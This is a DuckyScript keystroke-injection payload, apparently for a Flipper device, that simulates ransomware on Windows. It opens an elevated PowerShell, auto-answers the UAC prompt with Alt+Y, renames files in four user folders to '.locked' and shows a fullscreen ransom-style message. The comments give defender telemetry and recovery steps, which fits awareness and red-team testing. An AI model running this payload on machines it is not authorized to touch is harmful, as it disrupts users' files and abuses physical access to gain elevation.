REM #########################################################################################################################
REM ################ This script was created by github.com/MarkCyber ############
REM ################ This script is intended to act as a simulation of a ransomware attack ############
REM ################ This script will change all file extensions to .locked rather than encrypting the files ############
REM #########################################################################################################################
REM
REM Format: DuckyScript keystroke payload (the comments mention a Flipper device) that types PowerShell on a Windows host.
REM Effect: files directly inside the Documents, Desktop, Pictures and Music folders get '.locked' appended to their names.
REM Scope: Get-ChildItem is called with -File and without -Recurse, so subfolders are not traversed; file contents are not modified.
REM Recovery: rename the affected files to strip the trailing '.locked'.
REM Telemetry a defender should expect from a run: powershell.exe started from the Run dialog, a UAC elevation prompt,
REM then a burst of renames to one new extension in user profile folders. PowerShell script block logging, when enabled,
REM is expected to record the typed commands - confirm in the test environment.
REM
REM Set delay for flipper (pause before the first keystroke is sent)
DELAY 500
REM Open the Run dialog (Windows key + R)
GUI r
DELAY 100
REM Start a second PowerShell with -Verb runAs, which requests elevation and raises a UAC prompt
STRING powershell -Command "Start-Process powershell -Verb runAs"
ENTER
DELAY 500
REM Alt+Y - presumably answers "Yes" on an English-language UAC consent prompt; verify on the target locale.
REM NOTE(review): on a standard-user account UAC asks for credentials instead, so this keystroke should not grant
REM elevation and the following STRING lines are typed into whatever window has focus - confirm before running.
ALT y
DELAY 500
REM Rename files in specified locations to append .locked to every file
REM $errorOccurred is set to $true when any Rename-Item call reports failure through $?
STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } }
REM Typed onto the same command line as the rename loop (no ENTER in between): leave the session if any rename failed.
REM NOTE(review): after that exit the payload still sends the remaining keystrokes to whichever window has focus.
STRING IF ($errorOccurred) { exit }
ENTER
DELAY 1000
REM Display ransomware message: a maximized, topmost WPF window whose text states that this is a simulation
STRING Add-Type -AssemblyName PresentationFramework; $Window = New-Object System.Windows.Window; $Window.WindowStartupLocation = 'CenterScreen'; $Window.WindowState = 'Maximized'; $Window.Topmost = $true; $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'; $Window.ShowDialog()
ENTER
DELAY 1000
REM Intended to close the PowerShell session.
REM NOTE(review): ShowDialog() blocks until the window is closed, so these keystrokes are probably sent while the
REM message window has focus; check afterwards that no elevated console is left open on the host.
STRING exit
ENTER